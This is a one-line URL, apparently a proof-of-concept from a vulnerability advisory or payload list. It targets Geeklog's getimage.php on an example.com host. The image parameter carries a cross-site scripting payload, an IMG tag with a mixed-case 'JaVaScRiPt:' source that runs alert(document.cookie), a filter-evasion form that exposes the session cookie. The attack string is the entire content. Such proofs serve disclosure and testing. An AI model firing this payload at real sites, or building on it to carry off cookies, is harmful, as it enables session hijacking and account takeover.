http://www.example.com/geeklog/getimage.php?mode=show&image=./<IMG%20SRC=JaVaScRiPt:alert(document.cookie)>